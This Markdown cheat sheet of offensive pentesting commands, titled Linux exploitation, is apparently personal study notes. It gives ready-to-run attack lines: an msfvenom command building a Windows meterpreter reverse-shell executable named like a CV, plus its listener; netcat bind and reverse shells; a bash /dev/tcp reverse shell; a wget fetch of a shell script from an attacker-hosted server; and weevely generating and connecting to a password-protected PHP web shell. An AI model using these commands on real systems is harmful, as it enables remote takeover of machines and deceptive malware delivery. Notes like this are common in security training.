1.5-Linux-Exploitation.md

Pre-Intrusion phase (Linux)

Exploitation

Searchsploit

searchsploit <keyword>

• -m: mirror download the exploit
• -u: show url to its CVE
• -x: view the file
• -p: view path of file

requests lib error for python2

git clone https://github.com/kennethreitz/requests
cd requests && python setup.py
pip3 install --force-reinstall requests
pip3 install --ignore-installed requests

Metaspoit

msfconsole

MsfVenom

# Reverse malware
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<your_ip> LPORT=<your_port> -f exe -o cv-username.exe
# listener
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST tun0; set LPORT 'listening port'; exploit"

Python HTTP Server

python3 -m http.server
wget <your_ip>:8000/rev.sh

Netcat

connect

# attacker before
nc -lvnp 4444
# client after
nc <rhost> 4444

• -l: Listen
• -v: Verbose
• -n: Do not use DNS
• -p: What port to listen on

bind shell

# client before
nc -lvnp 4444 -e "/bin/bash -i"
# attacker after
nc <rhost> 4444

reverse shell

# attacker before
nc -lvnp 4444
# client after
nc <rhost> 4444 -e "/bin/bash -i"

Bash

# reverse shell
bash -i >& /dev/tcp/<your_ip>/4444 0>&1

Weevely

Weaponized web shell with password

weevely generate s3cr3t shell.php
weevely http://192.168.1.202/shell.php s3cr3t